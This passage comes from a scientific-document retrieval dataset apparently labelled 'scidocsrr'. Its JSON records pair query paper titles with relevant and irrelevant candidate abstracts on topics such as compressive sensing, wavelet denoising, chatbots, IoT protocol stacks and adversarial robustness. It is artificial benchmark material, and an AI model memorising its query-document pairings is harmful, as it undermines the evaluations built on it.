"text": "Humans have a unique ability to learn more than one language — a skill that is thought to be mediated by functional (rather than structural) plastic changes in the brain. Here we show that learning a second language increases the density of grey matter in the left inferior parietal cortex and that the degree of structural reorganization in this region is modulated by the proficiency attained and the age at acquisition. This relation between grey-matter density and performance may represent a general principle of brain organization.",
"title": ""
},
{
"docid": "6e5e7dbff8030de9c0a8e9cac353430a",
"text": "Learning effective fusion of multi-modality features is at the heart of visual question answering. We propose a novel method of dynamically fusing multi-modal features with intraand inter-modality information flow, which alternatively pass dynamic information between and across the visual and language modalities. It can robustly capture the high-level interactions between language and vision domains, thus significantly improves the performance of visual question answering. We also show that the proposed dynamic intra-modality attention flow conditioned on the other modality can dynamically modulate the intramodality attention of the target modality, which is vital for multimodality feature fusion. Experimental evaluations on the VQA 2.0 dataset show that the proposed method achieves state-of-the-art VQA performance. Extensive ablation studies are carried out for the comprehensive analysis of the proposed method.",
"title": ""
}
] | scidocsrr |
7cdcdab23ea993e9a435da2271f3b024 | Compressive sensing: From theory to applications, a survey | [
{
"docid": "c6a44d2313c72e785ae749f667d5453c",
"text": "Donoho and Johnstone (1992a) proposed a method for reconstructing an unknown function f on [0; 1] from noisy data di = f(ti) + zi, i = 0; : : : ; n 1, ti = i=n, zi iid N(0; 1). The reconstruction f̂ n is de ned in the wavelet domain by translating all the empirical wavelet coe cients of d towards 0 by an amount p 2 log(n) = p n. We prove two results about that estimator. [Smooth]: With high probability f̂ n is at least as smooth as f , in any of a wide variety of smoothness measures. [Adapt]: The estimator comes nearly as close in mean square to f as any measurable estimator can come, uniformly over balls in each of two broad scales of smoothness classes. These two properties are unprecedented in several ways. Our proof of these results develops new facts about abstract statistical inference and its connection with an optimal recovery model.",
"title": ""
}
] | [
{
"docid": "7ec33dfb4321acbada95b6a6ac38f1ea",
"text": "A chatterbot or chatbot aims to make a conversation between both human and machine. The machine has been embedded knowledge to identify the sentences and making a decision itself as response to answer a question. The response principle is matching the input sentence from user. From input sentence, it will be scored to get the similarity of sentences, the higher score obtained the more similar of reference sentences. The sentence similarity calculation in this paper using bigram which divides input sentence as two letters of input sentence. The knowledge of chatbot are stored in the database. The chatbot consists of core and interface that is accessing that core in relational database management systems (RDBMS). The database has been employed as knowledge storage and interpreter has been employed as stored programs of function and procedure sets for pattern-matching requirement. The interface is standalone which has been built using programing language of Pascal and Java.",
"title": ""
},
{
"docid": "ce8fea47b1f323d39185403705500687",
"text": "Today, there is a big veriety of different approaches and algorithms of data filtering and recommendations giving. In this paper we describe traditional approaches and explane what kind of modern approaches have been developed lately. All the paper long we will try to explane approaches and their problems based on a movies recommendations. In the end we will show the main challanges recommender systems come across.",
"title": ""
},
{
"docid": "4625d09122eb2e42a201503405f7abfa",
"text": "OBJECTIVE\nTo summarize 16 years of National Collegiate Athletic Association (NCAA) injury surveillance data for 15 sports and to identify potential modifiable risk factors to target for injury prevention initiatives.\n\n\nBACKGROUND\nIn 1982, the NCAA began collecting standardized injury and exposure data for collegiate sports through its Injury Surveillance System (ISS). This special issue reviews 182 000 injuries and slightly more than 1 million exposure records captured over a 16-year time period (1988-1989 through 2003-2004). Game and practice injuries that required medical attention and resulted in at least 1 day of time loss were included. An exposure was defined as 1 athlete participating in 1 practice or game and is expressed as an athlete-exposure (A-E).\n\n\nMAIN RESULTS\nCombining data for all sports, injury rates were statistically significantly higher in games (13.8 injuries per 1000 A-Es) than in practices (4.0 injuries per 1000 A-Es), and preseason practice injury rates (6.6 injuries per 1000 A-Es) were significantly higher than both in-season (2.3 injuries per 1000 A-Es) and postseason (1.4 injuries per 1000 A-Es) practice rates. No significant change in game or practice injury rates was noted over the 16 years. More than 50% of all injuries were to the lower extremity. Ankle ligament sprains were the most common injury over all sports, accounting for 15% of all reported injuries. Rates of concussions and anterior cruciate ligament injuries increased significantly (average annual increases of 7.0% and 1.3%, respectively) over the sample period. These trends may reflect improvements in identification of these injuries, especially for concussion, over time. Football had the highest injury rates for both practices (9.6 injuries per 1000 A-Es) and games (35.9 injuries per 1000 A-Es), whereas men's baseball had the lowest rate in practice (1.9 injuries per 1000 A-Es) and women's softball had the lowest rate in games (4.3 injuries per 1000 A-Es).\n\n\nRECOMMENDATIONS\nIn general, participation in college athletics is safe, but these data indicate modifiable factors that, if addressed through injury prevention initiatives, may contribute to lower injury rates in collegiate sports.",
"title": ""
},
{
"docid": "299f24e2ef6cc833d008656a5d8e4552",
"text": "In computational intelligence, the term ‘memetic algorithm’ has come to be associated with the algorithmic pairing of a global search method with a local search method. In a sociological context, a ‘meme’ has been loosely defined as a unit of cultural information, the social analog of genes for individuals. Both of these definitions are inadequate, as ‘memetic algorithm’ is too specific, and ultimately a misnomer, as much as a ‘meme’ is defined too generally to be of scientific use. In this paper, we extend the notion of memes from a computational viewpoint and explore the purpose, definitions, design guidelines and architecture for effective memetic computing. Utilizing two conceptual case studies, we illustrate the power of high-order meme-based learning. With applications ranging from cognitive science to machine learning, memetic computing has the potential to provide much-needed stimulation to the field of computational intelligence by providing a framework for higher order learning.",
"title": ""
},
{
"docid": "0a8c009d1bccbaa078f95cc601010af3",
"text": "Deep neural networks (DNNs) have transformed several artificial intelligence research areas including computer vision, speech recognition, and natural language processing. However, recent studies demonstrated that DNNs are vulnerable to adversarial manipulations at testing time. Specifically, suppose we have a testing example, whose label can be correctly predicted by a DNN classifier. An attacker can add a small carefully crafted noise to the testing example such that the DNN classifier predicts an incorrect label, where the crafted testing example is called adversarial example. Such attacks are called evasion attacks. Evasion attacks are one of the biggest challenges for deploying DNNs in safety and security critical applications such as self-driving cars.\n In this work, we develop new DNNs that are robust to state-of-the-art evasion attacks. Our key observation is that adversarial examples are close to the classification boundary. Therefore, we propose region-based classification to be robust to adversarial examples. Specifically, for a benign/adversarial testing example, we ensemble information in a hypercube centered at the example to predict its label. In contrast, traditional classifiers are point-based classification, i.e., given a testing example, the classifier predicts its label based on the testing example alone. Our evaluation results on MNIST and CIFAR-10 datasets demonstrate that our region-based classification can significantly mitigate evasion attacks without sacrificing classification accuracy on benign examples. Specifically, our region-based classification achieves the same classification accuracy on testing benign examples as point-based classification, but our region-based classification is significantly more robust than point-based classification to state-of-the-art evasion attacks.",
"title": ""
},
{
"docid": "2f98ed3e1ddc2eee9b8e4309c125a925",
"text": "With the rise of social networking sites (SNSs), individuals not only disclose personal information but also share private information concerning others online. While shared information is co-constructed by self and others, personal and collective privacy boundaries become blurred. Thus there is an increasing concern over information privacy beyond the individual perspective. However, limited research has empirically examined if individuals are concerned about privacy loss not only of their own but their social ties’; nor is there an established instrument for measuring the collective aspect of individuals’ privacy concerns. In order to address this gap in existing literature, we propose a conceptual framework of individuals’ collective privacy concerns in the context of SNSs. Drawing on the Communication Privacy Management (CPM) theory (Petronio, 2002), we suggest three dimensions of collective privacy concerns, namely, collective information access, control and diffusion. This is followed by the development and empirical validation of a preliminary scale of SNS collective privacy concerns (SNSCPC). Structural model analyses confirm the three-dimensional conceptualization of SNSCPC and reveal antecedents of SNS users’ concerns over violations of the collective privacy boundaries. This paper serves as a starting point for theorizing privacy as a collective notion and for understanding online information disclosure as a result of social interaction and group influence.",
"title": ""
},
{
"docid": "1fd00838f916cbace1d1ff63dc7d8fad",
"text": "Multiple-burner induction-heating cooking appliances are suitable for using multiple-output inverters. Some common approaches use several single-output inverters or a single-output inverter multiplexing the loads along the time periodically. By specifying a two-output series-resonant high-frequency inverter, a new inverter is obtained fulfilling the requirements. The synthesized converter can be considered as a two-output extension of a full-bridge topology. It allows the control of the two outputs, simultaneously and independently, up to their rated powers saving component count compared with the two-converter solution and providing a higher utilization of electronics. To verify theoretical predictions, the proposed converter is designed and tested experimentally in an induction-heating appliance prototype. A fixed-frequency control strategy is digitally implemented with good final performances for the application, including ZVS operation for active devices and a quick heating function. Although the work is focused on low-power induction heating, it can be probably useful for other power electronic applications.",
"title": ""
},
{
"docid": "846905c567dfddfab0b8c4ee60cc283b",
"text": "Social media sentiment analysis (also known as opinion mining) which aims to extract people’s opinions, attitudes and emotions from social networks has become a research hotspot. Conventional sentiment analysis concentrates primarily on the textual content. However, multimedia sentiment analysis has begun to receive attention since visual content such as images and videos is becoming a new medium for self-expression in social networks. In order to provide a reference for the researchers in this active area, we give an overview of this topic and describe the algorithms of sentiment analysis and opinion mining for social multimedia. Having conducted a brief review on textual sentiment analysis for social media, we present a comprehensive survey of visual sentiment analysis on the basis of a thorough investigation of the existing literature. We further give a summary of existing studies on multimodal sentiment analysis which combines multiple media channels. We finally summarize the existing benchmark datasets in this area, and discuss the future research trends and potential directions for multimedia sentiment analysis. This survey covers 100 articles during 2008–2018 and categorizes existing studies according to the approaches they adopt.",
"title": ""
},
{
"docid": "e16560ee4e0d6e62fee3421d4d94f74f",
"text": "Industries keep a check on all statistics of their business and process this data using various data mining techniques to measure profit trends, revenue, growing markets and interesting opportunities to invest. These statistical records keep on increasing and increase very fast. Unfortunately, as the data grows it becomes a tedious task to process such a large data set and extract meaningful information. Also if the data generated is in various formats, its processing possesses new challenges. Owing to its size, big data is stored in Hadoop Distributed File System (HDFS). In this standard architecture, all the Data Nodes function parallel but functioning of a single Data Node is still in sequential fashion. This paper proposes to execute tasks assigned to a single Data Node in parallel instead of executing them sequentially. We propose to use a bunch of streaming multi-processors (SMs) for each single Data Node. An SM can have various processors and memory and all SMs run in parallel and independently. We process big data which may be coming from different sources in different formats to run parallelly on a Hadoop cluster, use the proposed technique and yield desired results efficiently. We have applied proposed methodology to the raw data of an industrial firm, for doing intelligent business, with a final objective of finding profit generated for the firm and its trends throughout a year. We have done analysis over a yearlong data as trends generally repeat after a year.",
"title": ""
},
{
"docid": "11c4f0610d701c08516899ebf14f14c4",
"text": "Histone post-translational modifications impact many aspects of chromatin and nuclear function. Histone H4 Lys 20 methylation (H4K20me) has been implicated in regulating diverse processes ranging from the DNA damage response, mitotic condensation, and DNA replication to gene regulation. PR-Set7/Set8/KMT5a is the sole enzyme that catalyzes monomethylation of H4K20 (H4K20me1). It is required for maintenance of all levels of H4K20me, and, importantly, loss of PR-Set7 is catastrophic for the earliest stages of mouse embryonic development. These findings have placed PR-Set7, H4K20me, and proteins that recognize this modification as central nodes of many important pathways. In this review, we discuss the mechanisms required for regulation of PR-Set7 and H4K20me1 levels and attempt to unravel the many functions attributed to these proteins.",
"title": ""
},
{
"docid": "ff4d7c7aa17f5925e5514aef9e0963f9",
"text": "We present a novel concept for wideband, wide-scan phased array applications. The array is composed by connected-slot elements loaded with artificial dielectric superstrates. The proposed solution consists of a single multi-layer planar printed circuit board (PCB) and does not require the typically employed vertical arrangement of multiple PCBs. This offers advantages in terms of complexity of the assembly and cost of the array. We developed an analytical method for the prediction of the array performance, in terms of active input impedance. This method allows to estimate the relevant parameters of the array with a negligible computational cost. A design example with a bandwidth exceeding one octave (VSWR<;2 from 6.5 to 14.3) and scanning up to 50 degrees for all azimuth planes is presented.",
"title": ""
},
{
"docid": "7d6c441d745adf8a7f6d833da9e46716",
"text": "X-ray computed tomography is a widely used method for nondestructive visualization of the interior of different samples - also of wooden material. Different to usual applications very high resolution is needed to use such CT images in dendrochronology and to evaluate wood species. In dendrochronology big samples (up to 50 cm) are necessary to scan. The needed resolution is - depending on the species - about 20 mum. In wood identification usually very small samples have to be scanned, but wood anatomical characters of less than 1 mum in width have to be visualized. This paper deals with four examples of X-ray CT scanned images to be used for dendrochronology and wood identification.",
"title": ""
},
{
"docid": "1607e3f1b44093f0d5f9940b6e391579",
"text": "Craniofacial characteristics in two groups of children were compared. In one group (n = 22) the children had Angle Class II division 2 malocclusion combined with extreme deep bite. The other group (n = 25) was composed of children with ideal occlusion. The mean ages of the children were 12.8 and 12.9 years respectively. In the Class II-2 group the distance between gonion and B-point was underdeveloped, causing B-point to have a retruded position in relation to both A-point and cranial base. The Class II-2 children also had a retroclination of the symphysis, which gave the B-point a retruded position in relation to pogonion. As for vertical dimensions, Class II-2 children had a smaller anterior lower facial height than normal. Furthermore, Class II-2 had a discrepancy between the maxillary incisal and molar heights, i.e. a slightly larger incisal height and a slightly smaller molar height. Finally, children with Class II-2 had a high lip line and a very large interincisal angle. Three variables--the sagittal distance between points A and B, the inclination of the symphysis, and the relationship between the maxillary incisal and molar heights--in combination, differentiated nearly 100% correctly between Class II-2 and normal occlusion.",
"title": ""
},
{
"docid": "01fbdd81917cba76851cd566d6f0b1da",
"text": "Flexible hybrid electronics (FHE), designed in wearable and implantable configurations, have enormous applications in advanced healthcare, rapid disease diagnostics, and persistent human-machine interfaces. Soft, contoured geometries and time-dynamic deformation of the targeted tissues require high flexibility and stretchability of the integrated bioelectronics. Recent progress in developing and engineering soft materials has provided a unique opportunity to design various types of mechanically compliant and deformable systems. Here, we summarize the required properties of soft materials and their characteristics for configuring sensing and substrate components in wearable and implantable devices and systems. Details of functionality and sensitivity of the recently developed FHE are discussed with the application areas in medicine, healthcare, and machine interactions. This review concludes with a discussion on limitations of current materials, key requirements for next generation materials, and new application areas.",
"title": ""
},
{
"docid": "fcbf97bfbcf63ee76f588a05f82de11e",
"text": "The Deliberation without Attention (DWA) effect refers to apparent improvements in decision-making following a period of distraction. It has been presented as evidence for beneficial unconscious cognitive processes. We identify two major concerns with this claim: first, as these demonstrations typically involve subjective preferences, the effects of distraction cannot be objectively assessed as beneficial; second, there is no direct evidence that the DWA manipulation promotes unconscious decision processes. We describe two tasks based on the DWA paradigm in which we found no evidence that the distraction manipulation led to decision processes that are subjectively unconscious, nor that it reduced the influence of presentation order upon performance. Crucially, we found that a lack of awareness of decision process was associated with poorer performance, both in terms of subjective preference measures used in traditional DWA paradigm and in an equivalent task where performance can be objectively assessed. Therefore, we argue that reliance on conscious memory itself can explain the data. Thus the DWA paradigm is not an adequate method of assessing beneficial unconscious thought.",
"title": ""
},
{
"docid": "a57aa7ff68f7259a9d9d4d969e603dcd",
"text": "Society has changed drastically over the last few years. But this is nothing new, or so it appears. Societies are always changing, just as people are always changing. And seeing as it is the people who form the societies, a constantly changing society is only natural. However something more seems to have happened over the last few years. Without wanting to frighten off the reader straight away, we can point to a diversity of social developments that indicate that the changes seem to be following each other faster, especially over the last few decades. We can for instance, point to the pluralisation (or a growing versatility), differentialisation and specialisation of society as a whole. On a more personal note, we see the diversification of communities, an emphasis on emancipation, individualisation and post-materialism and an increasing wish to live one's life as one wishes, free from social, religious or ideological contexts.",
"title": ""
},
{
"docid": "58d61334bbad1447ac844a0cfd11b9da",
"text": "Much has been written on creating personas --- both what they are good for, and how to create them. A common problem with personas is that they are not based on real customer data, and if they are, the data set is not of a sample size that can be considered statistically significant. In this paper, we describe a new method for creating and validating personas, based on the statistical analysis of data, which is fast and cost effective.",
"title": ""
},
{
"docid": "621ccb0c477255108583505cde0f9eb3",
"text": "As a collective and highly dynamic social group, the human crowd is a fascinating phenomenon that has been frequently studied by experts from various areas. Recently, computer-based modeling and simulation technologies have emerged to support investigation of the dynamics of crowds, such as a crowd's behaviors under normal and emergent situations. This article assesses the major existing technologies for crowd modeling and simulation. We first propose a two-dimensional categorization mechanism to classify existing work depending on the size of crowds and the time-scale of the crowd phenomena of interest. Four evaluation criteria have also been introduced to evaluate existing crowd simulation systems from the point of view of both a modeler and an end-user.\n We have discussed some influential existing work in crowd modeling and simulation regarding their major features, performance as well as the technologies used in this work. We have also discussed some open problems in the area. This article will provide the researchers with useful information and insights on the state of the art of the technologies in crowd modeling and simulation as well as future research directions.",
"title": ""
},
{
"docid": "89460f94140b9471b120674ddd904948",
"text": "Cross-disciplinary research on collective intelligence considers that groups, like individuals, have a certain level of intelligence. For example, the study by Woolley et al. (2010) indicates that groups which perform well on one type of task will perform well on others. In a pair of empirical studies of groups interacting face-to-face, they found evidence of a collective intelligence factor, a measure of consistent group performance across a series of tasks, which was highly predictive of performance on a subsequent, more complex task. This collective intelligence factor differed from the individual intelligence of group members, and was significantly predicted by members’ social sensitivity – the ability to understand the emotions of others based on visual facial cues (Baron-Cohen et al. 2001).",
"title": ""
},
{
"docid": "90b1d5b2269f742f9028199c34501043",
"text": "Motivated by the desire to construct compact (in terms of expected length to be traversed to reach a decision) decision trees, we propose a new node splitting measure for decision tree construction. We show that the proposed measure is convex and cumulative and utilize this in the construction of decision trees for classification. Results obtained from several datasets from the UCI repository show that the proposed measure results in decision trees that are more compact with classification accuracy that is comparable to that obtained using popular node splitting measures such as Gain Ratio and the Gini Index. 2008 Published by Elsevier Inc.",
"title": ""
}
] | scidocsrr |
1fc0ffd8316652539c1e8af4fdde86aa | Medical Persona Classification in Social Media | [
{
"docid": "7ff11b2ba0be98489efed796086e7908",
"text": "It is still an open question where to search for complying a specific information need due to the large amount and diversity of information available. In this paper, a content analysis of health-related information provided in the Web is performed to get an overview on the medical content available. In particular, the content of medical Question & Answer Portals, medical weblogs, medical reviews and Wikis is compared. For this purpose, medical concepts are extracted from the text material with existing extraction technology. Based on these concepts, the content of the different knowledge resources is compared. Since medical weblogs describe experiences as well as information, it is of large interest to be able to distinguish between informative and affective posts. For this reason, a method to classify blogs based on their information content is presented, which exploits high-level features describing the medical and affective content of blog posts. The results show that there are substantial differences in the content of various health-related Web resources. Weblogs and answer portals mainly deal with diseases and medications. The Wiki and the encyclopedia provide more information on anatomy and procedures. While patients and nurses describe personal aspects of their life, doctors aim to present health-related information in their blog posts. The knowledge on content differences and information content can be exploited by search engines to improve ranking, search and to direct users to appropriate knowledge sources. 2009 Elsevier Inc. All rights reserved.",
"title": ""
}
] | [
{
"docid": "8af3b1f6b06ff91dee4473bfb50c420d",
"text": "Crowdsensing technologies are rapidly evolving and are expected to be utilized on commercial applications such as location-based services. Crowdsensing collects sensory data from daily activities of users without burdening users, and the data size is expected to grow into a population scale. However, quality of service is difficult to ensure for commercial use. Incentive design in crowdsensing with monetary rewards or gamifications is, therefore, attracting attention for motivating participants to collect data to increase data quantity. In contrast, we propose Steered Crowdsensing, which controls the incentives of users by using the game elements on location-based services for directly improving the quality of service rather than data size. For a feasibility study of steered crowdsensing, we deployed a crowdsensing system focusing on application scenarios of building processes on wireless indoor localization systems. In the results, steered crowdsensing realized deployments faster than non-steered crowdsensing while having half as many data.",
"title": ""
},
{
"docid": "32ae0b0c5b3ca3a7ede687872d631d29",
"text": "Background—The benefit of catheter-based reperfusion for acute myocardial infarction (MI) is limited by a 5% to 15% incidence of in-hospital major ischemic events, usually caused by infarct artery reocclusion, and a 20% to 40% need for repeat percutaneous or surgical revascularization. Platelets play a key role in the process of early infarct artery reocclusion, but inhibition of aggregation via the glycoprotein IIb/IIIa receptor has not been prospectively evaluated in the setting of acute MI. Methods and Results —Patients with acute MI of,12 hours’ duration were randomized, on a double-blind basis, to placebo or abciximab if they were deemed candidates for primary PTCA. The primary efficacy end point was death, reinfarction, or any (urgent or elective) target vessel revascularization (TVR) at 6 months by intention-to-treat (ITT) analysis. Other key prespecified end points were early (7 and 30 days) death, reinfarction, or urgent TVR. The baseline clinical and angiographic variables of the 483 (242 placebo and 241 abciximab) patients were balanced. There was no difference in the incidence of the primary 6-month end point (ITT analysis) in the 2 groups (28.1% and 28.2%, P50.97, of the placebo and abciximab patients, respectively). However, abciximab significantly reduced the incidence of death, reinfarction, or urgent TVR at all time points assessed (9.9% versus 3.3%, P50.003, at 7 days; 11.2% versus 5.8%, P50.03, at 30 days; and 17.8% versus 11.6%, P50.05, at 6 months). Analysis by actual treatment with PTCA and study drug demonstrated a considerable effect of abciximab with respect to death or reinfarction: 4.7% versus 1.4%, P50.047, at 7 days; 5.8% versus 3.2%, P50.20, at 30 days; and 12.0% versus 6.9%, P50.07, at 6 months. The need for unplanned, “bail-out” stenting was reduced by 42% in the abciximab group (20.4% versus 11.9%, P50.008). Major bleeding occurred significantly more frequently in the abciximab group (16.6% versus 9.5%, P 0.02), mostly at the arterial access site. There was no intracranial hemorrhage in either group. Conclusions—Aggressive platelet inhibition with abciximab during primary PTCA for acute MI yielded a substantial reduction in the acute (30-day) phase for death, reinfarction, and urgent target vessel revascularization. However, the bleeding rates were excessive, and the 6-month primary end point, which included elective revascularization, was not favorably affected.(Circulation. 1998;98:734-741.)",
"title": ""
},
{
"docid": "66313e7ec725fa6081a9d834ce87cb2e",
"text": "In this paper, the DCXO is based on a Pierce oscillator with two MIM capacitor arrays for tuning the anti-resonant frequency of a 19.2MHz crystal. Each array of MIM capacitors is thermometer-coded and formatted in a matrix shape to facilitate layout. Although a segmented architecture is an area-efficient method for implementing a SC array, a thermometer-coded array provides the best linearity and guarantees a monotonic frequency tuning characteristic, which is of utmost importance in an AFC system.",
"title": ""
},
{
"docid": "783d7251658f9077e05a7b1b9bd60835",
"text": "A method is presented for the representation of (pictures of) faces. Within a specified framework the representation is ideal. This results in the characterization of a face, to within an error bound, by a relatively low-dimensional vector. The method is illustrated in detail by the use of an ensemble of pictures taken for this purpose.",
"title": ""
},
{
"docid": "3f0286475580e4c5663023593ef12aff",
"text": "ABSRACT Sliding mode control has received much attention due to its major advantages such as guaranteed stability, robustness against parameter variations, fast dynamic response and simplicity in the implementation and therefore has been widely applied to control nonlinear systems. This paper discus the sliding mode control technic for controlling hydropower system and generalized a model which can be used to simulate a hydro power plant using MATLAB/SIMULINK. This system consist hydro turbine connected to a generator coaxially, which is connected to grid. Simulation of the system can be done using various simulation tools, but SIMULINK is preferred because of simplicity and useful basic function blocks. The Simulink program is used to obtain the systematic dynamic model of the system and testing the operation with different PID controllers, SMC controller with additional integral action.",
"title": ""
},
{
"docid": "3c778c71f621b2c887dc81e7a919058e",
"text": "We have witnessed the Fixed Internet emerging with virtually every computer being connected today; we are currently witnessing the emergence of the Mobile Internet with the exponential explosion of smart phones, tablets and net-books. However, both will be dwarfed by the anticipated emergence of the Internet of Things (IoT), in which everyday objects are able to connect to the Internet, tweet or be queried. Whilst the impact onto economies and societies around the world is undisputed, the technologies facilitating such a ubiquitous connectivity have struggled so far and only recently commenced to take shape. To this end, this paper introduces in a timely manner and for the first time the wireless communications stack the industry believes to meet the important criteria of power-efficiency, reliability and Internet connectivity. Industrial applications have been the early adopters of this stack, which has become the de-facto standard, thereby bootstrapping early IoT developments with already thousands of wireless nodes deployed. Corroborated throughout this paper and by emerging industry alliances, we believe that a standardized approach, using latest developments in the IEEE 802.15.4 and IETF working groups, is the only way forward. We introduce and relate key embodiments of the power-efficient IEEE 802.15.4-2006 PHY layer, the power-saving and reliable IEEE 802.15.4e MAC layer, the IETF 6LoWPAN adaptation layer enabling universal Internet connectivity, the IETF ROLL routing protocol enabling availability, and finally the IETF CoAP enabling seamless transport and support of Internet applications. The protocol stack proposed in the present work converges towards the standardized notations of the ISO/OSI and TCP/IP stacks. What thus seemed impossible some years back, i.e., building a clearly defined, standards-compliant and Internet-compliant stack given the extreme restrictions of IoT networks, is commencing to become reality.",
"title": ""
},
{
"docid": "95b3c332334b002c8fa086d97a471c17",
"text": "Reliability is becoming more and more important as the size and number of installed Wind Turbines (WTs) increases. Very high reliability is especially important for offshore WTs because the maintenance and repair of such WTs in case of failures can be very expensive. WT manufacturers need to consider the reliability aspect when they design new power converters. By designing the power converter considering the reliability aspect the manufacturer can guarantee that the end product will ensure high availability. This paper represents an overview of the various aspects of reliability prediction of high power Insulated Gate Bipolar Transistors (IGBTs) in the context of wind power applications. At first the latest developments and future predictions about wind energy are briefly discussed. Next the dominant failure mechanisms of high power IGBTs are described and the most commonly used lifetime prediction models are reviewed. Also the concept of Accelerated Life Testing (ALT) is briefly reviewed.",
"title": ""
},
{
"docid": "f372bc2ed27f5d4c08087ddc46e5373e",
"text": "This work investigates the practice of credit scoring and introduces the use of the clustered support vector machine (CSVM) for credit scorecard development. This recently designed algorithm addresses some of the limitations noted in the literature that is associated with traditional nonlinear support vector machine (SVM) based methods for classification. Specifically, it is well known that as historical credit scoring datasets get large, these nonlinear approaches while highly accurate become computationally expensive. Accordingly, this study compares the CSVM with other nonlinear SVM based techniques and shows that the CSVM can achieve comparable levels of classification performance while remaining relatively cheap computationally. 2014 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "b7959c06c8057418762e12ef2c0ce2ce",
"text": "According to Bayesian theories in psychology and neuroscience, minds and brains are (near) optimal in solving a wide range of tasks. We challenge this view and argue that more traditional, non-Bayesian approaches are more promising. We make 3 main arguments. First, we show that the empirical evidence for Bayesian theories in psychology is weak. This weakness relates to the many arbitrary ways that priors, likelihoods, and utility functions can be altered in order to account for the data that are obtained, making the models unfalsifiable. It further relates to the fact that Bayesian theories are rarely better at predicting data compared with alternative (and simpler) non-Bayesian theories. Second, we show that the empirical evidence for Bayesian theories in neuroscience is weaker still. There are impressive mathematical analyses showing how populations of neurons could compute in a Bayesian manner but little or no evidence that they do. Third, we challenge the general scientific approach that characterizes Bayesian theorizing in cognitive science. A common premise is that theories in psychology should largely be constrained by a rational analysis of what the mind ought to do. We question this claim and argue that many of the important constraints come from biological, evolutionary, and processing (algorithmic) considerations that have no adaptive relevance to the problem per se. In our view, these factors have contributed to the development of many Bayesian \"just so\" stories in psychology and neuroscience; that is, mathematical analyses of cognition that can be used to explain almost any behavior as optimal.",
"title": ""
},
{
"docid": "bdbd3d65c79e4f22d2e85ac4137ee67a",
"text": "With the advances in new-generation information technologies, especially big data and digital twin, smart manufacturing is becoming the focus of global manufacturing transformation and upgrading. Intelligence comes from data. Integrated analysis for the manufacturing big data is beneficial to all aspects of manufacturing. Besides, the digital twin paves a way for the cyber-physical integration of manufacturing, which is an important bottleneck to achieve smart manufacturing. In this paper, the big data and digital twin in manufacturing are reviewed, including their concept as well as their applications in product design, production planning, manufacturing, and predictive maintenance. On this basis, the similarities and differences between big data and digital twin are compared from the general and data perspectives. Since the big data and digital twin can be complementary, how they can be integrated to promote smart manufacturing are discussed.",
"title": ""
},
{
"docid": "f5a7a4729f9374ee7bee4401475647f9",
"text": "In the last decade, deep learning has contributed to advances in a wide range computer vision tasks including texture analysis. This paper explores a new approach for texture segmentation using deep convolutional neural networks, sharing important ideas with classic filter bank based texture segmentation methods. Several methods are developed to train Fully Convolutional Networks to segment textures in various applications. We show in particular that these networks can learn to recognize and segment a type of texture, e.g. wood and grass from texture recognition datasets (no training segmentation). We demonstrate that Fully Convolutional Networks can learn from repetitive patterns to segment a particular texture from a single image or even a part of an image. We take advantage of these findings to develop a method that is evaluated on a series of supervised and unsupervised experiments and improve the state of the art on the Prague texture segmentation datasets.",
"title": ""
},
{
"docid": "3250454b6363a9bb49590636d9843a92",
"text": "A low precision deep neural network training technique for producing sparse, ternary neural networks is presented. The technique incorporates hardware implementation costs during training to achieve significant model compression for inference. Training involves three stages: network training using L2 regularization and a quantization threshold regularizer, quantization pruning, and finally retraining. Resulting networks achieve improved accuracy, reduced memory footprint and reduced computational complexity compared with conventional methods, on MNIST and CIFAR10 datasets. Our networks are up to 98% sparse and 5 & 11 times smaller than equivalent binary and ternary models, translating to significant resource and speed benefits for hardware implementations.",
"title": ""
},
{
"docid": "498efbd728aec5dba57788af33bd404d",
"text": "Functional connectivity (FC) sheds light on the interactions between different brain regions. Besides basic research, it is clinically relevant for applications in Alzheimer's disease, schizophrenia, presurgical planning, epilepsy, and traumatic brain injury. Simulations of whole-brain mean-field computational models with realistic connectivity determined by tractography studies enable us to reproduce with accuracy aspects of average FC in the resting state. Most computational studies, however, did not address the prominent non-stationarity in resting state FC, which may result in large intra- and inter-subject variability and thus preclude an accurate individual predictability. Here we show that this non-stationarity reveals a rich structure, characterized by rapid transitions switching between a few discrete FC states. We also show that computational models optimized to fit time-averaged FC do not reproduce these spontaneous state transitions and, thus, are not qualitatively superior to simplified linear stochastic models, which account for the effects of structure alone. We then demonstrate that a slight enhancement of the non-linearity of the network nodes is sufficient to broaden the repertoire of possible network behaviors, leading to modes of fluctuations, reminiscent of some of the most frequently observed Resting State Networks. Because of the noise-driven exploration of this repertoire, the dynamics of FC qualitatively change now and display non-stationary switching similar to empirical resting state recordings (Functional Connectivity Dynamics (FCD)). Thus FCD bear promise to serve as a better biomarker of resting state neural activity and of its pathologic alterations.",
"title": ""
},
{
"docid": "5fc9fe7bcc50aad948ebb32aefdb2689",
"text": "This paper explores the use of set expansion (SE) to improve question answering (QA) when the expected answer is a list of entities belonging to a certain class. Given a small set of seeds, SE algorithms mine textual resources to produce an extended list including additional members of the class represented by the seeds. We explore the hypothesis that a noise-resistant SE algorithm can be used to extend candidate answers produced by a QA system and generate a new list of answers that is better than the original list produced by the QA system. We further introduce a hybrid approach which combines the original answers from the QA system with the output from the SE algorithm. Experimental results for several state-of-the-art QA systems show that the hybrid system performs better than the QA systems alone when tested on list question data from past TREC evaluations.",
"title": ""
},
{
"docid": "48966a0436405a6656feea3ce17e87c3",
"text": "Complex regional pain syndrome (CRPS) is a chronic, intensified localized pain condition that can affect children and adolescents as well as adults, but is more common among adolescent girls. Symptoms include limb pain; allodynia; hyperalgesia; swelling and/or changes in skin color of the affected limb; dry, mottled skin; hyperhidrosis and trophic changes of the nails and hair. The exact mechanism of CRPS is unknown, although several different mechanisms have been suggested. The diagnosis is clinical, with the aid of the adult criteria for CRPS. Standard care consists of a multidisciplinary approach with the implementation of intensive physical therapy in conjunction with psychological counseling. Pharmacological treatments may aid in reducing pain in order to allow the patient to participate fully in intensive physiotherapy. The prognosis in pediatric CRPS is favorable.",
"title": ""
},
{
"docid": "6e6237011de5348d9586fb70941b4037",
